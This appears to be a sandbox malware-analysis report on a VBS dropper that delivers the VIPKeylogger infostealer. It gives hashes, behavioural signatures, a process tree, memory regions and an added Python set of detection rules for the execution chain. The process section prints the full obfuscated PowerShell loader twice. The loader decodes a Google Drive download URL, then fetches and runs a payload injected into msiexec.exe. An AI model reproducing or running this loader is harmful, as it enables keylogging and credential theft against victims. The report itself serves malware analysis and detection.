Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-10-2024 14:46

General

  • Target

    Pedido de Cotação-24100004_lista comercial.vbs

  • Size

    523KB

  • MD5

    071b2e84cdf90885bce11e5713dab307

  • SHA1

    ea48ea5b782669f05084a4a1e374ff64c8f581c0

  • SHA256

    400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741

  • SHA512

    a981122c9f3f2675f116c2b860e6f05016ab7be3a9cd9eee873af4f89ff7d93548cce9c020d79fa7bf191d04f664f127efadfdca5019b5ec2699498837d46664

  • SSDEEP

    6144:BA/7iXwe0h73QXqs1SQl3GZF+lfd0okbN9VusXmFtzbVHcje9wYYhnQgjDHgs91+:LKhgamowdhkFuW0tXwjQg/p1+FWg

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#. It resembles SnakeKeylogger, which was first observed in 2020.

  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Executes commands through powershell.exe.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to read the victim system's language setting in order to infer the host's geographical location.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
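The signatures above are the sandbox's behavioural labels. The parent/child chain recorded in the Processes section below (WScript.exe running the .vbs, powershell.exe launched by it with a block-comment-laden command line, and a 32-bit powershell.exe starting msiexec.exe with nothing but its own path, after which msiexec.exe makes network requests) translates into process-creation rules like the Python below. This is an added example and not part of this report: the events are constructed to mirror the tree on this page, the field names follow Sysmon event ID 1, the parent of WScript.exe and the two benign comparison events are assumptions, and the length threshold is a starting point rather than a tuned value.

```python
"""Process-creation heuristics for the execution chain in this report.

Added example with constructed events; it is not sandbox output and not part
of the report.  Field names follow Sysmon event ID 1 (Image, CommandLine,
ParentImage).  The parent of WScript.exe and the two benign comparison events
are assumptions; the report only shows WScript.exe as a tree root.
"""
import re
from typing import Dict, List, Tuple

# Script hosts whose PowerShell children are worth a look (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Inline PowerShell commands longer than this are rare outside obfuscated
# loaders; the one on this page is several kilobytes.  Tune per environment.
LONG_COMMAND = 1000


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, with surrounding quotes removed."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def tokens(cmdline: str) -> List[str]:
    """Split a command line on whitespace while keeping quoted paths intact."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def is_bare_launch(event: Dict[str, str]) -> bool:
    """True when the command line is nothing but the executable's own path,
    as with the msiexec.exe child in this report."""
    parts = tokens(event["CommandLine"])
    return len(parts) == 1 and basename(parts[0]) == basename(event["Image"])


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches, in rule order."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    # WScript.exe/CScript.exe -> powershell.exe (T1059.005 handing off to T1059.001)
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    # Block comments (<# ... #>) and multi-kilobyte one-liners are obfuscation tells
    if image == "powershell.exe" and ("<#" in cmd or len(cmd) > LONG_COMMAND):
        hits.append("obfuscated_powershell_command")
    # powershell.exe starting msiexec.exe with no arguments: a host process for
    # injection (T1055), not an installer run
    if parent == "powershell.exe" and image == "msiexec.exe" and is_bare_launch(event):
        hits.append("powershell_spawns_bare_msiexec")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str, List[str]]]:
    """(index, image name, matched rules) for every event that matched something."""
    findings = []
    for idx, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            findings.append((idx, basename(event["Image"]), hits))
    return findings


# Constructed events mirroring the Processes section of this report, plus two
# benign controls.  Command line 1 is a shortened copy of the page's.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"',
     "ParentImage": r"C:\Windows\explorer.exe"},            # parent assumed
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                     '" <#Gulvtppes adelskrones Saligprisningerne Issens #>;'
                     "$Conversance='Trecifrede';"
                     "function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}\""),
     "ParentImage": r"C:\Windows\System32\WScript.exe"},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\msiexec.exe"',
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # benign install (assumed)
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\tool.msi" /qn',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign (assumed)
     "CommandLine": r'powershell.exe -NoProfile -Command "Get-Date"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for idx, image, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx} ({image}): {', '.join(hits)}")
```

A bare msiexec.exe started by PowerShell has no installer work to do. Read together with the WriteProcessMemory and MapViewOfSection signatures on PID 2972 and the network requests attributed to PID 1856, it is consistent with code injection into a freshly spawned host process, so the third rule is the one to alert on rather than merely log.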

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: 
FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V 
oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . 
Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: 
FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V 
oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . 
Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1856

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp

    Filesize

    7KB

    MD5

    53eb1a2da1daa6ff5f0ececcca12b7ef

    SHA1

    25998cd34dffa6cbdf55b227ab1a7fe728859e15

    SHA256

    0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa

    SHA512

    46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21

  • C:\Users\Admin\AppData\Roaming\Symbolerne.rab

    Filesize

    447KB

    MD5

    4fa4bfe12534bd26a9e268a1e659e510

    SHA1

    f42014f4e7c0f11f4bb5f559c88310eb6db186a3

    SHA256

    11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0

    SHA512

    34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01

  • memory/1856-43-0x00000000004D0000-0x0000000000518000-memory.dmp

    Filesize

    288KB

  • memory/1856-42-0x00000000004D0000-0x0000000001532000-memory.dmp

    Filesize

    16.4MB

  • memory/1856-20-0x00000000004D0000-0x0000000001532000-memory.dmp

    Filesize

    16.4MB

  • memory/2672-13-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-10-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-12-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

    Filesize

    4KB

  • memory/2672-4-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

    Filesize

    4KB

  • memory/2672-15-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-9-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-8-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-7-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2672-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

  • memory/2972-19-0x00000000065E0000-0x000000000B7C9000-memory.dmp

    Filesize

    81.9MB